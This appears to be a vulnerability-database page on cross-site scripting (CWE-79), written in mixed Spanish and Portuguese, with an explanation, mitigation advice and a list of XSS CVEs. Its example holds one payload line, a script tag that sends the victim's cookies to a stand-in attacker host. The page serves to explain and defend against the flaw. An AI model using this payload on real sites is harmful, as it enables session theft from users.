Fallos del tipo CWE-79

29.060 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-39025MEDIUMe-Excellence Inc. U-Office Force - Reflected XSSEPSS 0.5%CVE-2022-29442MEDIUMPrivate Messages For WordPress <= 2.1.10 - Authenticated Stored Cross-Site Scripting (XSS) vulnerabilityEPSS 0.5%CVE-2023-4841MEDIUMFeeds for YouTube <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via ShortcodeEPSS 0.5%CVE-2020-15119MEDIUMDOM-based XSS in auth0-lockEPSS 0.5%CVE-2014-125096LOWFancy Gallery Plugin Options Page class.options.php cross site scriptingEPSS 0.5%CVE-2014-125095LOWBestWebSoft Contact Form Plugin bws_menu.php bws_add_menu_render cross site scriptingEPSS 0.5%CVE-2022-2729MEDIUMCross-site Scripting (XSS) - DOM in openemr/openemrEPSS 0.5%CVE-2023-6923MEDIUMMatomo <= 4.15.3 - Reflected Cross-Site Scripting via idsiteEPSS 0.5%CVE-2022-29440MEDIUMWordPress Promotion Slider plugin <= 3.3.4 - Multiple Authenticated Stored Cross-Site Scripting (XSS) vulnerabilitiesEPSS 0.5%CVE-2026-81753MEDIUMFlowintel Stored XSS in Case Notes via Malicious Mermaid Diagram ContentEPSS 0.5%CVE-2023-0310CRITICALCross-site Scripting (XSS) - Stored in thorsten/phpmyfaqEPSS 0.5%CVE-2025-25460MEDIUMA stored Cross-Site Scripting (XSS) vulnerability was identified in FlatPress 1.3.1 within the "Add Entry" feature. This vulnerability allowEPSS 0.5%CVE-2024-2293MEDIUMSite Reviews <= 6.11.4 - Authenticated(Subscriber+) Stored Cross-Site Scripting via display nameEPSS 0.5%CVE-2023-2477LOWFunadmin Cx.php tagLoad cross site scriptingEPSS 0.5%CVE-2026-0534HIGHStored XSS in the value of a part attributeEPSS 0.5%CVE-2024-1919LOWSourceCodester Online Job Portal Manage Walkin Page ManageWalkin.php cross site scriptingEPSS 0.5%CVE-2022-36390MEDIUMWordPress Event Calendar – Calendar plugin <= 1.4.6 - Authenticated Reflected Cross-Site Scripting (XSS) vulnerabilityEPSS 0.5%CVE-2013-10028LOWEELV Newsletter Plugin lettreinfo.php style_newsletter cross site scriptingEPSS 0.5%CVE-2022-39024MEDIUMe-Excellence Inc. U-Office Force - Reflected XSSEPSS 0.5%CVE-2020-20697MEDIUMCross Site Scripting vulnerability in khodakhah NodCMS v.3.0 allows a remote attacker to execute arbitrary code and gain access to senstivieEPSS 0.5%